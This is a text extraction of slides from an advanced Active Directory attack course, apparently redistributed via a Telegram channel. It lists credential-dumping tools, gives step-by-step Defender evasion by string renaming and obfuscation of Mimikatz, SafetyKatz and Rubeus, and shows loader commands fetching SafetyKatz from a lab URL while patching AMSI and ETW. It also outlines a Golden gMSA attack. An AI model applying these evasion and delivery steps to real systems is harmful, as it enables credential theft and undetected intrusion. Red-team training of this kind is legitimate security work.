https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Powerview command reference - https://www.harmj0y.net/blog/powershell/running-laps-with-powerview/

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 115


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 116


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

For abusing LAPS for persistence, see: https://rastamouse.me/2018/03/laps---part-2/


https://2017.hack.lu/archive/2017/HackLU_2017_Malicious_use_LAPS_Clementz_Go
ichot.pdf

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 117


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 118


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 119

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 119


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://github.com/gentilkiwi/mimikatz
Unofficial mimikatz guide:
https://adsecurity.org/?p=2207

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-
find-credentials-in-them
https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1
https://github.com/b4rtik/SharpKatz
https://github.com/outflanknl/Dumpert
https://github.com/Flangvik/BetterSafetyKatz
https://github.com/GhostPack/SafetyKatz
https://github.com/deepinstinct/Lsass-Shtinkering

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://github.com/skelsec/pypykatz
https://github.com/Hackndo/lsassy
https://github.com/SecureAuthCorp/impacket/
https://github.com/FSecureLABS/physmem2profit

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://github.com/deepinstinct/Lsass-Shtinkering

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Reference for logon types: https://www.alteredsecurity.com/post/fantastic-windows-


logon-types-and-where-to-find-credentials-in-them

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://github.com/GhostPack/Rubeus/

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Offensive .NET - Introduction


• Currently, .NET lacks some of the security features implemented in
System.Management.Automation.dll.
• Because of this, many Red teams have included .NET in their tradecraft.
• There are many open source Offensive .NET tools and we will use the
ones that fit our attack methodology.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 128

A repo of popular Offensive C# tools - https://github.com/Flangvik/SharpCollection

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 128


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Offensive .NET - Tradecraft


• When using .NET (or any other compiled language) there are some challenges
– Detection by countermeasures like AV, EDR etc.
– Delivery of the payload (Recall PowerShell's sweet download-execute
cradles)
– Detection by logging like process creation logging, command line logging
etc.
• We will try and address the AV detection and delivery of the payload as and
when required during the class ;)
• You are on your own when the binaries that we share start getting detected
by Windows Defender!

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 129

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 129


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Offensive .NET - Tradecraft - AV bypass


• We will focus mostly on bypass of signature based detection by
Windows Defender.
• For that, we can use techniques like Obfuscation, String Manipulation
etc.
• We can use DefenderCheck (https://github.com/t3hbb/DefenderCheck) to
identify code and strings from a binary / file that Windows Defender
may flag.
• This helps us in deciding on modifying the source code and minimal
obfuscation.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 130

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 130


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Offensive .NET - Tradecraft - AV bypass -


DefenderCheck
• Let's check SharpKatz.exe for signatures using DefenderCheck
DefenderCheck.exe <Path to Sharpkatz binary>

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 131

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 131


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Offensive .NET - Tradecraft - AV bypass -


String Manipulation
• Open the project in Visual Studio.
• Press "CTRL + H".
• Find and replace the string "Credentials" with "Credents" you can use any other
string as an replacement. (Make sure that string is not present in the code)
• Select the scope as "Entire Solution".
• Press "Replace All" button.
• Build and recheck the binary with DefenderCheck.
• Repeat above steps if still there is detection

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 132

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 132


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Offensive .NET - Tradecraft - AV bypass -


String Manipulation
For SafetyKatz, we used the following steps
• Download latest version of Mimikatz and Out-CompressedDll.ps1
• Run the Out-CompressedDll.ps1 PowerShell script on Mimikatz binary and save the
output to a file.
Out-CompressedDll <Path to mimikatz.exe> >
outputfilename.txt

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 133

https://github.com/gentilkiwi/mimikatz
https://github.com/PowerShellMafia/PowerSploit/blob/master/ScriptModification/O
ut-CompressedDll.ps1

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 133


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Offensive .NET - Tradecraft - AV bypass -


String Manipulation
• Copy the value of the variable
"$EncodedCompressedFile"
from the output file above and
replace the value of
"compressedMimikatzString"
variable in the "Constants.cs"
file of SafetyKatz.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 134

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 134


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Offensive .NET - Tradecraft - AV bypass -


String Manipulation
• Copy the byte size from the output file and replace it in "Program.cs" file on the line 111 & 116.
• Build and recheck the binary with DefenderCheck.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 135

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 135


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Offensive .NET - Tradecraft - AV bypass -


BetterSafetyKatz
For BetterSafetyKatz, we used the following steps
• Download the latest release of "mimikatz_trunk.zip" file.
• Convert the file to base64 value.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 136

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 136


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Offensive .NET - Tradecraft - AV bypass -


BetterSafetyKatz
• Modify the "Program.cs" file.
– Added a new variable that contains the base64 value of "mimikatz_trunk.zip" file.
– Comment the code that downloads or accepts the mimikatz file as an argument.
– Convert the base64 string to bytes and pass it to "zipStream" variable.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 137

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 137


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Offensive .NET - Tradecraft - AV bypass -


Obfuscation
• For Rubeus.exe, we used ConfuserEx (https://github.com/mkaring/ConfuserEx) to
obfuscate the binary.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 138

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 138


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Offensive .NET - Tradecraft - AV bypass -


Obfuscation
Launch ConfuserEx
• In Project tab select the Base Directory where the binary file is located.
• In Project tab Select the Binary File that we want to obfuscate.
• In Settings tab add the rules.
• In Settings tab edit the rule and select the preset as `Normal`.
• In Protect tab click on the protect button.

We will find the new obfuscated binary in the Confused folder under the Base
Directory.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 139

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 139


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 140

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 140


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Offensive .NET - Tradecraft - AV bypass -


Obfuscation
• After obfuscating the binary with ConfuserEx rescan using DefenderCheck we can
see the detection of GUID.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 141

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 141


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Offensive .NET - Tradecraft - AV bypass -


Obfuscation
• Generate and modify the GUID and compile Rubeus again and rerun the ConfuserEx
on the Rubeus.exe binary.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 142

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 142


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Offensive .NET - Tradecraft - Payload Delivery


• We can use NetLoader (https://github.com/Flangvik/NetLoader) to deliver
our binary payloads.
• It can be used to load binary from filepath or URL and patch AMSI & ETW
while executing.
C:\Users\Public\Loader.exe -path
http://192.168.100.X/SafetyKatz.exe

• We also have AssemblyLoad.exe that can be used to load the NetLoader in-
memory from a URL which then loads a binary from a filepath or URL.
C:\Users\Public\AssemblyLoad.exe
http://192.168.100.X/Loader.exe -path
http://192.168.100.X/SafetyKatz.exe

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 143

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 143


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 144


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 145

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 145


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-
accounts/group-managed-service-accounts-overview

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-
adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-
adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 151


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Golden gMSA
• gMSA password is calculated by leveraging the secret stored in KDS root key object.
• We need following attributes of the KDS root key to compute the Group Key Envelope (GKE) :
– cn
– msKds-SecretAgreementParam
– msKds-RootKeyData
– msKds-KDFParam
– msKds-KDFAlgorithmID
– msKds-CreateTime
– msKds-UseStartTime
– msKds-Version
– msKds-DomainID
– msKds-PrivateKeyLength
– msKds-PublicKeyLength
– msKds-SecretAgreementAlgorithmID

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 152

https://www.semperis.com/blog/golden-gmsa-attack/

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 152


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Golden gMSA
• Once we compute the GKE for the associated KDS root key we can
generate the password offline.
• Only privilege accounts such as Domain Admins, Enterprise Admins or
SYSTEM can retrieve the KDS root key.
• Once the KDS root key is compromised we can’t protect the associated
gMSAs accounts.
• Golden gMSA can be used to retrieve the information of gMSA account,
KDS root key and generate the password offline.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 153

https://www.semperis.com/blog/golden-gmsa-attack/

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 153


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 154

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 154


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Domain Privilege Escalation


• So we have administrative access to studentuserx, us-mgmt, us-mailmgmt, us-jump and us-web!
• We are now ready to escalate privileges to Domain Admin!

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 155

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 155


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://labs.mwrinfosecurity.com/blog/trust-years-to-earn-seconds-to-break/
http://www.labofapenetrationtester.com/2016/02/getting-domain-admin-with-
kerberos-unconstrained-delegation.html
https://adsecurity.org/?p=1667
http://blogs.msdn.com/b/autz_auth_stuff/archive/2011/05/03/kerberos-
delegation.aspx

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 161


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

http://www.labofapenetrationtester.com/2016/02/getting-domain-admin-with-
kerberos-unconstrained-delegation.html

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://www.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-
active-directory/41
https://docs.microsoft.com/en-
us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1
http://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-
trusts/

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-
efsr/08796ba8-01c8-4872-9221-1000ec2eff31

https://github.com/p0dalirius/Coercer
https://github.com/ShutdownRepo/ShadowCoerce
https://github.com/Wh04m1001/DFSCoerce
https://github.com/crisprss/magicNetdefs

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


